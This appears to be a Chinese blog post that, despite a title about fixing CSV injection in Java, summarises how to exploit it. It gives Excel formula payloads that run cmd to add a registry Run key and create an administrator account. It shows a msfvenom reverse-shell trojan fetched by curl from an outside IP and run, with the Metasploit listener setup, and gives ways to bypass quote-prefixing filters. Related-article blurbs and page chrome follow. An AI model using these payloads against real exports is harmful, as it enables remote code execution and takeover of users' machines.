csv注入java怎么解决_csv注入利用和绕过总结

最新推荐文章于 2024-02-25 16:38:23 发布
最新推荐文章于 2024-02-25 16:38:23 发布
阅读量2.1k 收藏 3
点赞数
文章标签: csv注入java怎么解决
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28802509/article/details/114777787
版权

csv注入

csv注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中,当在excel中打开csv文件时,文件会转换为excel格式并提供excel公式的执行功能,会造成命令执行问题。

漏洞原理

漏洞原理就是excel的一个特性,当单元格中内容以=-+@等符号开头时,excel将会将其当成一个公式处理。

所以当我们输入=1+1时,excel会自动将其计算

那么利用这个办法,把等号后面的内容改为执行cmd命令控制其打开一个计算器

=1+cmd|' /C calc'!A0

漏洞利用

修改注册表

=cmd|'/C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v calc /t REG_SZ /d c:\windows\system32\calc.exe /f'!A0

添加用户ed1105ab902ffda41d37c9b2317df16a.png

=cmd|'/C net user test 123456 /add'!A0+

=cmd|'/C net user test 123456 /add && net localgroup administrators test /add'!A0

7c2fb1d9e422eb570f86c7a735b7816e.png可以使用命令注入中的知识,同时执行两个命令,达到新建一个管理员用户的效果

下载木马,反弹shell

准备木马

#msf生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o reverse_tcp.exe

#python2开启http服务

python -m SimpleHTTPServer 8888

#python3开启http服务

python -m http.server 8888

攻击机监听

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST xxx.xxx.xxx.xxx

set LPORT 4444

run

靶机从python http服务下载木马并执行

curl http://170.170.64.17:8888/reverse_tcp.exe --output windowsLocal.exe && .\windowsLocal.exe

那么我们在csv注入场景下的payload就是

=cmd|'/C curl http://170.170.64.17:8888/reverse_tcp.exe --output windowsLocal.exe && .\windowsLocal.exe'!A0

不过这个方法一般会在下载步骤被windows防火墙拦截,可以自行增加一层编解码或者加解密过程。

反弹shell也可以通过调用powershell下载powercat反弹,使用nc监听。

漏洞绕过

其他运算符号绕过

很多场景下服务器会过滤=,但是在excel中,+,-,@等也可以触发公式

-cmd|' /C calc'!A0

+cmd|' /C calc'!A0

@SUM(cmd|'/c calc'!A0)

%0A绕过自动添加单引号

有些防御手法会在等号之类的运算符前增加’,或每个元素开头直接添加单引号,可使用%0A换行执行

%0A-1+cmd|' /C calc'!A0

;绕过自动添加单引号

有些防御手法会在等号之类的运算符前增加’,或每个元素开头直接添加单引号,可使用;分割,分别执行

;-1+cmd|' /C calc'!A0

Pandarum
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞挖掘】——46、 CSV注入实践操作
Fly_鹏程万里
06-07 36
CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。
aaa.rar_csv_java csv_oracle
09-21
标题中的"aaa.rar_csv_java csv_oracle"暗示了我们讨论的主题是使用Java处理CSV文件,并将其数据导入到Oracle数据库中。CSV(逗号分隔值)是一种常见的数据交换格式,通常用于存储表格数据,而Oracle数据库是企业级...
Web 安全之 CSV 注入攻击详解
最新发布
路多辛的所思所想
02-25 1405
CSV 是一种简单的文件格式,用于存储表格数据,每行一个数据记录,每个记录由逗号分隔的多个字段组成。CSV 文件因其简单性和跨平台性而被广泛使用,在数据导出和导入中尤其常见。CSV 注入攻击攻击者通过某些方式在 CSV 文件中注入恶意的代码,并利用电子表格软件处理 CSV 文件时的特性来执行恶意代码实现非法操作的攻击方式。这种攻击通常发生在应用程序在处理 CSV 文件时,没有正确地校验或转义用户输入的特殊字符,从而被攻击利用CSV 文件中注入恶意代码。
JAVA解决CSV注入漏洞的代码
搬砖人生的博客
10-29 3481
JAVA处理写入CSV的命令,函数等。处理特殊字符(“+、-、@、=”)以及逗号引起的格式问题
应用安全系列之十:CSV注入
jimmyleeee的专栏
03-03 4766
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 关于CSV注入,可能平时关注的人比较少,不过,只要有以csv文件格式导出数据,它就可能存在。很多系统都会导出csv,将数据用于分析。 首先介绍一下CSV的含义,CSV就是comma-separated-values,就是使用逗号分开的一串值,当使用excel打开时,逗号隔开的内容会被展开为对应行和列的一个cell的值。 ..
csv注入java怎么解决_CSV文件注入漏洞简析
weixin_39907596的博客
02-27 2056
“对于网络安全来说,一切的外部输入均是不可信的”。但是CSV文件注入漏洞确时常被疏忽,究其原因,可能是因为我们脑海里的第一印象是把CSV文件当作了普通的文本文件,未能引起警惕。一、漏洞定义攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。二、漏洞产生的原因1、CSV文件中的几个特殊符号“+、-、@、=”尝试在CS...
跟着开源项目学java3-从导出excel防止csv注入的提交看注入类的安全问题的解决思路
qq_39007838的博客
12-26 1338
csv注入 若依 common-utils
csv注入java怎么解决_CSV 注入实战
weixin_34910679的博客
02-27 1083
oxo1 前言之前看到过 CSV 注入的文章,具体想了解的请搜索学习,这里不多作介绍。今天刚好碰到了导出功能,就随手测试一波,没想到还真的存在 CSV 注入漏洞。oxo2 经过1、测试漏洞看到有导出功能,就新建一个用户,随手插入 Payload导出 CSV 文件查看 CSV 文件,发现结果等于 2 ,说明存在漏洞。2、利用漏洞这里反弹 shell就在本地演示好了. 利用 powershell 来进...
Web安全-浅析CSV注入漏洞的原理及利用
道阻且长,行则将至。
05-01 4065
文章目录漏洞简介漏洞原理漏洞利用命令执行钓鱼攻击反弹shell漏洞实例Twitter网站Hackerone漏洞挖掘漏洞防御 漏洞简介 CSV 注入(CSV Injection)漏洞通常会出现在有导出文件 (.csv/.xls) 功能的网站中。当导出的文件内容可控时,攻击者通常将恶意负载(公式)注入到输入字段中,用户导出文件打开后,EXCEL 会调用本身的动态功能,执行攻击者的恶意代码,从而控制用户计算机。 漏洞原理 人们通常认为 CSV 或 xls 文件中包含的文本不会有任何安全风险,这是比较大的一个误区。
csv.rar_csv_csv java_csv java_java vcf csv_java操作v
09-19
在IT行业中,CSV(Comma Separated Values)和VCF(vCard)是两种常见的文件格式,它们分别用于数据存储和联系人管理。本篇文章将深入探讨如何在Java环境中处理这两种格式,特别是如何使用Java来解析VCF文件,并将...
CSV.zip_WinCC_csv_csv wincc_zip
09-15
标题 "CSV.zip_WinCC_csv_csv wincc_zip" 暗示了这是一个关于在WinCC系统中生成CSV(逗号分隔值)文件的示例,而“zip”表明这个示例是打包在一个压缩文件中。描述 "in wincc csv genration example" 确认了这一点,...
java_cvs_解析
07-31
解析cvs
java生成csv文件乱码的解决方法示例 java导出csv乱码
09-04
Java中生成CSV(Comma Separated Values)文件时,可能会遇到乱码问题,这通常是由于编码设置不正确导致的。CSV文件是一种常见的数据交换格式,通常用于导入和导出数据到电子表格程序如Microsoft Excel。当在Java...
csvFile.rar_csv_csv qt
09-24
在这个场景中,"csvFile.rar_csv_csv qt" 提到的可能是一个压缩文件,其中包含了与CSV文件操作相关的资源。"csv_qt"标签可能意味着我们将在Qt框架下进行CSV文件的操作。Qt是一个跨平台的应用程序开发框架,用C++编写...
CSV注入
weixin_43025534的博客
04-25 2282
CSV 是“Comma-Separated Values”的缩写,是一种常见的数据格式。CSV 文件通常包含一系列以逗号分隔的值,每个值都表示数据的一个字段。这种数据格式常用于将数据从一个应用程序或系统转移到另一个应用程序或系统,因为它易于生成和解析,并且不依赖于特定的操作系统或软件。CSV 文件可以使用任何文本编辑器打开和编辑,也可以使用 Excel 打开。在 CSV 文件中,每个字段之间都用逗号分隔,行末通常用回车符和换行符表示。每一行表示数据的一条记录,每个字段表示记录中的一个属性。
CSRF攻击和防御(写的超详细)
weixin_49071539的博客
12-15 2201
当小绿登录正常网站服务器(VULNERABLE WEBSERVER),进行某些操作,操作完成之后没有退出,继续访问了另一个存在病毒的网站(MALUCIOUS WEBSUITE); 因为正常网站存在CSRF漏洞,正常网站的WEB服务器验证不够,当前网站的验证方式只是验证的用户的session存在,那么他就是一个已经登录的状态,但是没有办法保证某一次请求就是当前用户触发的。 在现在的一些app或者是网页中,在交易时会输入一个短信验证码,但是有一些网站并不是属于金额交易的,所以就并没有做这些设置,那如何组织这种.
csv注入java怎么解决_CSV Injection(CSV注入
weixin_34364239的博客
02-27 1232
简介许多web应用程序允许用户将发票模板或用户设置等内容下载到CSV文件中。许多用户选择在Excel、Libre Office或open Office中打开CSV文件。当web应用程序无法正确验证CSV文件的内容时,可能会导致执行一个或多个单元格的内容。漏洞利用最基本的利用方式是动态数据交换# pop a calcDDE ("cmd";"/C calc";"!A0")A0@SUM(1+1)*cmd...
java 操作文件及问题解决csv
weixin_43763430的博客
07-11 2615
调用createFile如:createFile(“D:\test.csv”);即可在D盘下创建了test.csv文件。csv文件写入特性,以字符写入用英文逗号(”,“)分隔即是单元格分离,如写入数据为"test11,test22,test33,test44,test55”,得到的文件是以”,"分隔的单元格数据:代码实现: 代码调用: 追加写入调用两次后的文件内容如下: 代码实现: 代码调用: 文件数据结果: 程序运行中生成的文件,在不断的往文件写入数据,若该文件在程序运行的途中被打开,之后的写入将会出现异
csv注入java怎么解决_浅谈CSV注入漏洞
weixin_29775447的博客
02-27 1948
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。背景某天在逛expdb时候看到了CSV Injection的exp,在渗透测试的过程中也偶尔会遇到类似的情况,这一漏洞很早之前就出现过,但是很多人没有意识到漏洞的危害性,于是抱着学习的心态进行了一波漏洞复现和学习。漏洞介绍CSV公式注入(CSV Injection)是一种会造成巨大影...
javacsv文件怎么制作_javacsv文件 java代码怎样生成csv文件
06-10
生成CSV文件可以使用Java中提供的CSV相关的类库,比如OpenCSV。 下面是一个简单的Java代码示例,使用OpenCSV将数据写入CSV文件: ```java import com.opencsv.CSVWriter; import java.io.FileWriter; import java.io.IOException; public class CsvWriterExample { public static void main(String[] args) throws IOException { // 创建一个CSVWriter对象,指定文件路径和分隔符 CSVWriter writer = new CSVWriter(new FileWriter("example.csv"), ','); // 写入表头 String[] header = {"Name", "Age", "Gender"}; writer.writeNext(header); // 写入数据行 String[] row1 = {"John", "25", "Male"}; String[] row2 = {"Emily", "30", "Female"}; String[] row3 = {"Tom", "20", "Male"}; writer.writeNext(row1); writer.writeNext(row2); writer.writeNext(row3); // 关闭writer writer.close(); } } ``` 运行该程序后,会在当前目录下生成一个名为`example.csv`的文件,内容如下: ``` Name,Age,Gender John,25,Male Emily,30,Female Tom,20,Male ``` 你可以根据自己的需求,修改代码中的数据和文件路径,生成自己的CSV文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值